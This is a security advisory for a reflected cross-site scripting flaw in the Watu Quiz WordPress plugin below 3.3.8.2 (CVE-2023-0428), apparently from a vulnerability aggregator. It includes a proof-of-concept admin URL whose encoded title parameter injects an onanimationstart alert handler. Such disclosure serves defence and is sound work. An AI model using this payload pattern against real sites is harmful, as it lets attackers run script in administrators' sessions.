Lucene search
Felipe Restrepo RodriguezWPEX-ID:C933460B-F77D-4986-9F5A-32D9F3F8B412HistoryJan 24, 2023 - 12:00 a.m.
Watu Quiz < 3.3.8.2 - Reflected XSS
2023-01-2400:00:00
Felipe Restrepo Rodriguez
143
watu quiz
reflected xss
logged in admin
malicious url
security vulnerability
admin panel
exploit
0.001 Low
EPSS
Percentile
35.3%
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
Make a logged in admin open the following URL:
https://example.com/wp-admin/admin.php?page=watu_exams&title=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2FRelated
nvd
nvd
CVE-2023-0428
2023-02-21 09:15:12
cve
cve
CVE-2023-0428
2023-02-21 09:15:12
wpvulndb
wpvulndb
Watu Quiz < 3.3.8.2 - Reflected XSS
2023-01-24 00:00:00
cvelist
cvelist
CVE-2023-0428 Watu Quiz < 3.3.8.2 - Reflected XSS
2023-02-21 08:50:56
prion
prion
Cross site scripting
2023-02-21 09:15:00